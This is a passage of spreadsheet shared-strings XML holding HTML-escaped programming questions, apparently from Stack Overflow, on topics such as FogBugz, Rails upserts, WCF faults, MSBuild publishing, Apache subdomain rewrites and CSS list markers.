  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;And/or: do I need one?&lt;/p&gt;
&lt;p&gt;I've recently started using FogBugz for my hobby projects, and I'm very happy with things so far. Having read more about it, especially the evidence-based scheduling, I'd like to start using it for my PhD as well. (Heh; something tells me my supervisors won't be opening tickets for me, though.)&lt;/p&gt;
&lt;p&gt;Last night I stumbled onto &lt;a href="http://www.mathworks.com/matlabcentral/fileexchange/loadFile.do?objectId=9016"&gt;TimePost&lt;/a&gt;, which looks like a tidy app that doesn't do much but could be a real bonus to logging my time in FogBugz effectively. I tried looking around for similar apps but came up a little empty-handed. Are there any other FogBugz clients that you've used and recommend for Mac OS X? Or are you happy with the web interface?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Versioning library like SQLite database library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like how SQLite library can be included into an application and the application has a full-fledged database to use.&lt;/p&gt;
&lt;p&gt;Similarly, is there an open source versioning library that I can include into my application so that I can save versions of files as well as do diffs and merges?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to test a MS Access application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With the code, forms and data inside the same database I am wondering what are the best practices to design a suite of tests for a Microsoft Access application (say for Access 2007).&lt;/p&gt;
&lt;p&gt;One of the main issues with testing forms is that only a few controls have a &lt;code&gt;hwnd&lt;/code&gt; handle and other controls only get one they have focus, which makes automation quite opaque since you cant get a list of controls on a form to act on.&lt;/p&gt;
&lt;p&gt;Any experience to share?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I break on exception using ddbg</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the d programing language to write a program, and I'm trying to use ddbg to debug it.  When there is an exception, I want to have the program break whenever there is an exception thrown so that I can inspect the stack.&lt;/p&gt;
&lt;p&gt;Alternatively, is there another debugger that works with d?  Is there another way to get a stack trace when there is an exception?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to parse a dependency tree from a build script output?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an inherited project that uses a build script (not make) to build and link the project with various libraries.&lt;/p&gt;
&lt;p&gt;When it performs a build I would like to parse the build output to determine what and where the actual static libraries being linked into the final executable are and where are they coming from.&lt;/p&gt;
&lt;p&gt;The script is compiling and linking with GNU tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the most useful (custom) code snippets for C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best code snippets for C#? (using visual studio)  VB has a lot that are pre-defined, but there are only a handful for C#.  Do you have any really useful ones for C#?&lt;/p&gt;
&lt;p&gt;Anyone want to post a good custom one you created yourself?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Ferris_Bueller" rel="nofollow"&gt;Anyone?... Bueller?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deciphering C++ template error messages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm really beginning to understand what people mean when they say that C++'s error messages are pretty terrible in regards to templates.  I've seen horrendously long errors for things as simple as a function not matching its prototype.&lt;/p&gt;
&lt;p&gt;Are there any tricks to deciphering these errors?&lt;/p&gt;
&lt;p&gt;EDIT:  I'm using both gcc and MSVC.  They both seem to be pretty terrible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving ViewState out of the page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are trying to lighten our page load as much as possible. Since ViewState can sometimes swell up to 100k of the page, I'd love to completely eliminate it.&lt;/p&gt;
&lt;p&gt;I'd love to hear some techniques other people have used to move ViewState to a custom provider.&lt;/p&gt;
&lt;p&gt;That said, a few caveats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We serve on average 2 Million unique visitors per hour.&lt;/li&gt;
&lt;li&gt;Because of this, Database reads have been a serious issue in performance, so I don't want to store ViewState in the database.&lt;/li&gt;
&lt;li&gt;We also are behind a load balancer, so any solution has to work with the user bouncing from machine to machine per postback.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free text search integrated with code coverage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any tool which will allow me to perform a free text search over a system's code, but only over the code which was actually executed during a particular invocation?&lt;/p&gt;
&lt;p&gt;To give a bit of background, when learning my way around a new system, I frequently find myself wanting to discover where some particular value came from, but searching the entire code base turns up far more matches than I can reasonably assess individually.&lt;/p&gt;
&lt;p&gt;For what it's worth, I've wanted this in Perl and Java at one time or another, but I'd love to know if any languages have a system supporting this feature.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I upsert a bunch of ActiveRecord objects and relationships in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with an API that provides bus arrival data. For every request, I get back (among other things) a list of which routes serve the stop in question. For example, if the list includes result for bus route #1, 2, and 5, then I know that those serve this stop.&lt;/p&gt;
&lt;p&gt;I have a many-to-many relationship set up between Route and Stop, and I want to dynamically check and update these associations on every request. There is no "master list" of which routes serve which stops, so this seems like the best way to get this data.&lt;/p&gt;
&lt;p&gt;I believe that the way I'm doing it now is very inefficient:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# routes is an array of [number, destination] that I build while iterating over the data
routes.uniq.each do |route|
  number      = route[0]
  destination = route[1]
  r = Route.find_by_number_and_destination(number, destination)
  if !r
    r = Route.new :number =&amp;gt; number, :destination =&amp;gt; destination
    r.save
  end
  # I have to check if it already exists because I can't find a way
  # to create a uniqueness constraint on the join table with 2 foreign keys
  r.stops &amp;lt;&amp;lt; stop unless r.stops.include? stop
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically, I have to do 2 things for every route I find:
1) Create it if it doesn't already exist, 2) Add a relationship to the current stop if it doesn't already exist.&lt;/p&gt;
&lt;p&gt;Is there a better way to do this, for example by getting a bunch of the data in memory and doing some of the processing on the app server side, in order to avoid the multitude of database calls I'm currently doing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free JSP plugin for eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was looking out for a free plugin for developing/debugging JSP pages in eclipse.&lt;br /&gt;
Any suggestions? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Ruby on Rails social networking framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm planning on creating a social networking + MP3 lecture downloading / browsing / commenting / discovery website using Ruby on Rails. Partially for fun and also as a means to learn some Ruby on Rails. I'm looking for a social networking framework that I can use as a basis for my site. I don't want to re-invent the wheel. &lt;/p&gt;
&lt;p&gt;Searching the web I found three such frameworks. Which of these three would you recommend using and why?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://portal.insoshi.com/"&gt;http://portal.insoshi.com/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.communityengine.org/"&gt;http://www.communityengine.org/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://lovdbyless.com/"&gt;http://lovdbyless.com/&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cannot handle FaultException</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have a wcf service that does an operation. and in this operation there could be a fault. i have stated that there could be a fault in my service contract. &lt;/p&gt;
&lt;p&gt;here is the code below;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void Foo()
{
        try
        {
            DoSomething(); // throws FaultException&amp;lt;FooFault&amp;gt;
        }
        catch (FaultException)
        {
            throw;
        }
        catch (Exception ex)
        {
            myProject.Exception.Throw&amp;lt;FooFault&amp;gt;(ex);
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in service contract;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[FaultException(typeof(FooFault))]
void Foo();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when a FaultException was thrown by DoSomething() method while i was running the application, firstly the exception was caught at "catch(Exception ex)" line and breaks in there. then when i pressed f5 again, it does what normally it has to. i wonder why that break exists? and if not could it be problem on publish?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse spelling engine does not exist</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Eclipse 3.4 (Ganymede) with CDT 5 on Windows.&lt;/p&gt;
&lt;p&gt;When the integrated spell checker doesn't know some word, it proposes (among others) the option to add the word to a user dictionary.&lt;/p&gt;
&lt;p&gt;If the user dictionary doesn't exist yet, the spell checker offers then to help configuring it and shows the "General/Editors/Text Editors/Spelling" preference pane. This preference pane however states that &lt;strong&gt;"The selected spelling engine does not exist"&lt;/strong&gt;, but has no control to add or install an engine.&lt;/p&gt;
&lt;p&gt;How can I put a spelling engine in existence?&lt;/p&gt;
&lt;p&gt;Update: What solved my problem was to install also the JDT. This solution was brought up on 2008-09-07 and was accepted, but is now missing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to disable Visual Studio macro "tip" balloon?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whenever I use a macro in Visual Studio I get an annoying tip balloon in the system tray and an accompanying "pop" sound. It says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Visual Studio .NET macros&lt;/p&gt;
  &lt;p&gt;To stop the macro from running, double-click the spinning cassette.&lt;br /&gt;
  Click here to not show this balloon again.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have trouble clicking the balloon because my macro runs so quickly.&lt;/p&gt;
&lt;p&gt;Is this controllable by some dialog box option?&lt;/p&gt;
&lt;p&gt;(I found someone else asking this question on &lt;a href="http://www.tech-archive.net/Archive/VisualStudio/microsoft.public.vsnet.ide/2005-11/msg00267.html"&gt;some other site&lt;/a&gt; but it's not answered there. I give credit here because I've copied and pasted some pieces from there.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I publish a Asp.NET web application using MSBuild?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to publish an Asp.net MVC web application locally using the NAnt and MSBuild. This is what I am using for my NAnt target;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;target name="publish-artifacts-to-build"&amp;gt;
    &amp;lt;msbuild project="my-solution.sln" target="Publish"&amp;gt;
      &amp;lt;property name="Configuration" value="debug" /&amp;gt;
      &amp;lt;property name="OutDir" value="builds\" /&amp;gt;
      &amp;lt;arg line="/m:2 /tv:3.5" /&amp;gt;
    &amp;lt;/msbuild&amp;gt;
&amp;lt;/target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and all I get is this as a response;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[msbuild]          Skipping unpublishable project.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible to publish web applications via the command line in this way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Something like a callback delegate function in php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to implement something similar to a c# delegate method in PHP.  A quick word to explain what I'm trying to do overall:  I am trying to implement some asynchronous functionality.  Basically some resource-intensive calls that get queued, cached, and dispatched when the underlying system gets around to it.  When the asynchronous call finally receives a response I would like a callback event to be raised.&lt;/p&gt;
&lt;p&gt;I am having some problems coming up with a mechanism to do callbacks in PHP.  I have come up with a method that works for now but I am unhappy with it.  Basically it involves passing a reference to the object and the name of the method on it that will serve as the callback (taking the response as an argument) and then use eval to call the method when need be.  This is sub-optimal for a variety of reasons, is there a better way of doing this that anyone knows of? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Winforms c# - Set focus to first child control of TabPage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have a &lt;code&gt;Textbox&lt;/code&gt; nested within a &lt;code&gt;TabControl&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;When the form loads, I would like to focus on that &lt;code&gt;Textbox&lt;/code&gt; (by default the focus is set to the &lt;code&gt;TabControl&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Simply calling &lt;code&gt;textbox1.focus()&lt;/code&gt; in the &lt;code&gt;Load&lt;/code&gt; event of the form does not appear to work.  &lt;/p&gt;
&lt;p&gt;I have been able to focus it by doing the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; private void frmMainLoad(object sender, EventArgs e)
 {
     foreach (TabPage tab in this.tabControl1.TabPages) 
     {
         this.tabControl1.SelectedTab = tab;
     }
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;My question is:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Is there a more elegant way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best Visual Studio addins?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently use Resharper and have for a few years now. I know there are a ton of other useful addins out there but i never seem to have the time to sort through them to see which is worthy of using. So i was hoping some of you would be able to help me do some sorting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a for loop in bash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the basic loop like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(int i = 0; i &amp;lt; MAX; i++) {
  doSomething(i);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but for bash.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I map a list of strings to my entity using NHibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got two tables in my database: Articles and Tags&lt;/p&gt;
&lt;p&gt;The Tags tables consist of ArticleID (foreign key) and a Tag (varchar).&lt;/p&gt;
&lt;p&gt;Now I need to map an articles tags into a readonly collection on Article entity, either using IList Tags or ReadOnlyCollection Tags.&lt;/p&gt;
&lt;p&gt;I've consulted the NHibernate reference material, but I can't seem to figure when to use Set, Bag and the other Nhibernate collections. I've seen examples using the ISet collection, but I really don't like to tie my entity classes to a NHibernate type.&lt;/p&gt;
&lt;p&gt;How can I do the mapping in NHibernate?&lt;/p&gt;
&lt;p&gt;Thank you in advance.&lt;/p&gt;
&lt;p&gt;edit: I ended up using a &lt;code&gt;&amp;lt;bag&amp;gt;&lt;/code&gt; instead, as it doesn't require an index:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;bag name="Tags" table="Tag" access="nosetter.camelcase" lazy="false"&amp;gt;
  &amp;lt;key column="ArticleId" /&amp;gt;
  &amp;lt;element column="Tag" type="System.String" /&amp;gt;
&amp;lt;/bag&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Deploying a project using LINQ to SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a winforms application using LINQ to SQL - and am building the app using a SQL Express instance on my workstation. The final installation of the project will be on a proper SQL Server 2005.  &lt;/p&gt;
&lt;p&gt;The database has the same name, and all tables are identical but the hostname is different. &lt;/p&gt;
&lt;p&gt;The only way I have found to make my app work from one machine to the next is to re-open the code in Visual Studio, delete all of the objects referring to the SQL express instance from my .mdbl, save the project, connect to the other server, drag all of the references back on, and rebuild the application for release once more.&lt;/p&gt;
&lt;p&gt;an answer here suggested that one can simply modify the app.config/web.config file - whih would work for asp.net, but this is a winforms application. What's the correct way of making LINQ to SQL apps use a new database without having to re-open the app in visual studio?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS 2005 &amp; 2008 library linking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it correct to link a static library (.lib) compiled with VS 2005 with a program which is compiled with VS 2008? Both library and my program are written in C++. This program is run on Windows Mobile 6 Professional emulator.&lt;/p&gt;
&lt;p&gt;This seems to work, there are no linking errors. However the program crashes during startup because strange things happen inside the linked library. E.g. lib can return a vector of characters with size of big negative number.&lt;/p&gt;
&lt;p&gt;There are no such problems when the program is compiled with VS 2005.&lt;/p&gt;
&lt;p&gt;What is even more strange the problem is only when using release configuration for the build. When compiling using debug configuration the problem doesn't occur.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Practical solution to center vertically and horizontally in HTML that works in FF, IE6 and IE7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What can be a practical solution to center vertically and horizontally content in HTML that works in Firefox, IE6 and IE7?&lt;/p&gt;
&lt;p&gt;Some details:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I am looking for solution for the entire page.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You need to specify only width of the element to be centered. Height of the element is not known in design time.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;When minimizing window, scrolling should appear only when all white space is gone.
In other words, width of screen should be represented as:  &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;"leftSpace width=(screenWidth-widthOfCenteredElement)/2"+&lt;br /&gt;
"centeredElement width=widthOfCenteredElement"+&lt;br /&gt;
"rightSpace width=(screenWidth-widthOfCenteredElement)/2"  &lt;/p&gt;
&lt;p&gt;And the same for the height:&lt;/p&gt;
&lt;p&gt;"topSpace height=(screenHeight-heightOfCenteredElement)/2"+&lt;br /&gt;
"centeredElement height=heightOfCenteredElement"+&lt;br /&gt;
"bottomSpace height=(screenWidth-heightOfCenteredElement)/2"&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;By practical I mean that use of tables is OK. I intend to use this layout mostly for special pages like login. So CSS purity is not so important here, while following standards is desirable for future compatibility.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Animation Extender Problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just started working with the &lt;code&gt;AnimationExtender&lt;/code&gt;.  I am using it to show a new div with a list gathered from a database when a button is pressed.  The problem is the button needs to do a postback to get this list as I don't want to make the call to the database unless it's needed.  The postback however stops the animation mid flow and resets it.  The button is within an update panel.&lt;/p&gt;
&lt;p&gt;Ideally I would want the animation to start once the postback is complete and the list has been gathered.  I have looked into using the &lt;code&gt;ScriptManager&lt;/code&gt; to detect when the postback is complete and have made some progress.  I have added two javascript methods to the page.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function linkPostback() {
        var prm = Sys.WebForms.PageRequestManager.getInstance();
        prm.add_endRequest(playAnimation)
    }
    function playAnimation() {
        var onclkBehavior = $find("ctl00_btnOpenList").get_OnClickBehavior().get_animation();
        onclkBehavior.play();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And Iâ€™ve changed the &lt;code&gt;btnOpenList.OnClientClick=â€linkPostback();â€&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This almost solves the problem.  Iâ€™m still get some animation stutter.  The animation starts to play before the postback and then plays properly after postback.  Using the &lt;code&gt;onclkBehavior.pause()&lt;/code&gt; has no effect.  I can get around this by setting the &lt;code&gt;AnimationExtender.Enabled = false&lt;/code&gt; and setting it to true in the buttons postback event.  This however works only once as now the AnimationExtender is enabled again.  I have also tried disabling the &lt;code&gt;AnimationExtender&lt;/code&gt; via javascript but this has no effect.&lt;/p&gt;
&lt;p&gt;Is there a way of playing the animations only via javascript calls?  I need to decouple the automatic link to the 
buttons click event so I can control when the animation is fired.&lt;/p&gt;
&lt;p&gt;Hope that makes sense.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;DG&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I export (and then import) a Subversion repository?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just about wrapped up on a project where I was using a commercial SVN provider to store the source code. The web host the customer ultimately picked includes a repository as part of the hosting package, so, now that the project is over, I'd like to relocate the repository to their web host and discontinue the commercial account.&lt;/p&gt;
&lt;p&gt;How would I go about doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache rewrite based on subdomain</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im trying to redirect requests for a wildcard domain to a sub-directory.&lt;br /&gt;
ie. &lt;code&gt;something.blah.domain.com&lt;/code&gt; --&gt; &lt;code&gt;blah.domain.com/something&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I dont know how to get the subdomain name to use in the rewrite rule.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Final Solution:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} !^blah\.domain\.com
RewriteCond %{HTTP_HOST} ^([^.]+)
RewriteRule ^(.*) /%1/$1 [L]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or as pointed out by pilif&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteCond %{HTTP_HOST} ^([^.]+)\.media\.xnet\.tk$
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you set your Cocoa application as the default web browser?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you set your Cocoa application as the default web browser?&lt;/p&gt;
&lt;p&gt;I want to create an application that is launched by default when the user clicks on an HTTP or HTTPS link in other applications (Mail, iChat etc.).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>64 bit tools like BoundsChecker &amp; Purify</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For many years I have used two great tools &lt;a href="http://www.compuware.com/products/devpartner/visualc.htm"&gt;BoundsChecker&lt;/a&gt; &amp;amp; &lt;a href="http://www-01.ibm.com/software/awdtools/purify/win/"&gt;Purify&lt;/a&gt;, but the developers of these applications have let me down, they no longer put effort into maintaining them or developing them. We have corporate accounts with both companies, and they both tell me that they have no intention of producing versions to support 64 bit applications.&lt;/p&gt;
&lt;p&gt;Can anyone recommend either open source or commercial alternatives that support 64 bit native C++/MFC applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problems with mouseout event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using JavaScript to hide an image and show some text thats hidden under it. But, when the text is shown if you scroll over it, it fires the mouseout event on the container, that then hides the text and shows the image again, and it just goes into a weird loop.&lt;/p&gt;
&lt;p&gt;The html looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div onmouseover="jsHoverIn('1')" onmouseout="jsHoverOut('1')"&amp;gt;
    &amp;lt;div style="" id="image1" /&amp;gt;
    &amp;lt;div id="text1" style="display: none;"&amp;gt;
        &amp;lt;p&amp;gt;some content&amp;lt;/p&amp;gt;
        &amp;lt;p&amp;gt;some more content&amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the javascript (It uses scriptaculous):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function jsHoverIn (id)
{
    if ( !visible[id] )
    {
        new Effect.Fade ("image"+id, {queue: { position: 'end', scope: id } });
        new Effect.Appear ("text"+id, {queue: { position: 'end', scope: id } });
        visible[id] = true;
    }
}
function jsHoverOut (id)
{
    var scope = Effect.Queues.get( id );
    scope.each( function( effect ){ effect.cancel() } );
    new Effect.Fade ("text"+id, {queue: { position: 'end', scope: id } });
    new Effect.Appear ("image"+id, {queue: { position: 'end', scope: id } });
    visible[id] = false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems really simple, but i just cant wrap my head around it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In HTML, what should happen to a selected, disabled option element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my specific example, I'm dealing with a drop-down, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select name="foo" id="bar"&amp;gt;
    &amp;lt;option disabled="disabled" selected="selected"&amp;gt;Select an item:&amp;lt;/option&amp;gt;
    &amp;lt;option&amp;gt;an item&amp;lt;/option&amp;gt;
    &amp;lt;option&amp;gt;another item&amp;lt;/option&amp;gt;
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Of course, that's pretty nonsensical, but I'm wondering whether any strict behaviour is defined. Opera effectively rejects the 'selected' attribute and selects the next item in the list. All other browsers appear to allow it, and it remains selected.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; To clarify, I'm specifically interested in the initial selection. I'm dealing with one of those 'Select an item:'-type drop-downs, in which case the first option is really a label, and an action occurs onchange(). This is &lt;em&gt;fairly&lt;/em&gt; well 'progressively enhanced', in that a submit button is present, and only removed via javascript. If the "select..." option were removed, whatever then were to become the first item would not be selectable. Are we just ruling out 'onchange' drop downs altogether, or should the "select..." option be selectable, just with no effect?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I understand threading in theory but not in practice in .net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a basic cs-major understanding of multi-threading but have never had to do anything beyond simple timers in an application. Does anyone know of a good resource that will give me a tour how to work with multi-threaded applications, explaining the basics and maybe posing some of the more difficult stuff?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mediawiki custom tag Stops page parsing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a few mediawiki custom tags, using the guide found here&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.mediawiki.org/wiki/Manual:Tag_extensions" rel="nofollow"&gt;http://www.mediawiki.org/wiki/Manual:Tag_extensions&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I will post my code below, but the problem is after it hits the first custom tag in the page, it calls it, and prints the response, but does not get anything that comes after it in the wikitext. It seems it just stops parsing the page.&lt;/p&gt;
&lt;p&gt;Any Ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( defined( 'MW_SUPPORTS_PARSERFIRSTCALLINIT' ) ) {
     $wgHooks['ParserFirstCallInit'][] = 'tagregister';
} else { // Otherwise do things the old fashioned way
     $wgExtensionFunctions[] = 'tagregister';
}
function tagregister(){
  global $wgParser;
  $wgParser-&gt;setHook('tag1','tag1func');
  $wgParser-&gt;setHook('tag2','tag2func');
  return true;
}
function tag1func($input,$params)
{
  return "It called me";
}
function tag2func($input,$params)
{
  return "It called me -- 2";
}&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Update: @George Mauer --  I have seen that as well, but this does not stop the page from rendering, just the Mediawiki engine from parsing the rest of the wikitext. Its as if hitting the custom function is signalling mediawiki that processing is done. I am in the process of diving into the rabbit hole but was hoping someone else has seen this behaviour.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to generalize an Apache ANT target?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an Apache ANT script to build our application, then check in the resulting JAR file into version control (VSS in this case).  However, now we have a change that requires us to build 2 JAR files for this project, then check both into VSS.&lt;/p&gt;
&lt;p&gt;The current target that checks the original JAR file into VSS discovers the name of the JAR file through some property.  Is there an easy way to "generalize" this target so that I can reuse it to check in a JAR file with any name?  In a normal language this would obviously call for a function parameter but, to my knowledge, there really isn't an equivalent concept in ANT.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Garbage Collection: Is it necessary to set large objects to null in a Dispose method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it necessary to set large objects to &lt;code&gt;null&lt;/code&gt; when implementing a &lt;code&gt;Dispose()&lt;/code&gt; method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database abstraction layers for (Visual) C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What options exist for accessing different databases from C++?
Put differently, what alternatives are there to ADO?
What are the pros and cons?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Replace huge Case statement in Classic ASP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a 200+ case statement in Classic ASP which is getting out of control. It sets 5 variables, based on which case is selected. Address, Phone, Name etc. Just sets the variables and nothing else in each case.&lt;/p&gt;
&lt;p&gt;Databases or files are not an option for this application.&lt;/p&gt;
&lt;p&gt;Coming from the Perl world I would use a hash to store this info. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does "display: marker" work in any current browsers, and if so, how?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't be sure if my code is sucking, or if it's just that the browsers haven't caught up with the spec yet.&lt;/p&gt;
&lt;p&gt;My goal is to simulate list markers using generated content, so as to get e.g. continuation of the counters from list to list in pure CSS. So the HTML is like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ol&amp;gt;
 &amp;lt;li&amp;gt;The&amp;lt;li&amp;gt;
 &amp;lt;li&amp;gt;quick&amp;lt;/li&amp;gt;
 &amp;lt;li&amp;gt;brown&amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;ol&amp;gt;
 &amp;lt;li&amp;gt;fox&amp;lt;/li&amp;gt;
 &amp;lt;li&amp;gt;jumped&amp;lt;/li&amp;gt;
 &amp;lt;li&amp;gt;over&amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the CSS, which I &lt;em&gt;think&lt;/em&gt; is correct according to &lt;a href="http://www.w3.org/TR/CSS2/generate.html#markers" rel="nofollow"&gt;the spec&lt;/a&gt;, is like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;html { counter-reset: myCounter; }
li { counter-increment: myCounter; }
li:before { content: counter(myCounter)". "; display: marker; width: 5em; text-align: right; marker-offset: 1em; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this doesn't seem to generate markers, in either FF3, Chrome, or IE8 beta 2, and if I recall correctly not Opera either (although I've since uninstalled Opera).&lt;/p&gt;
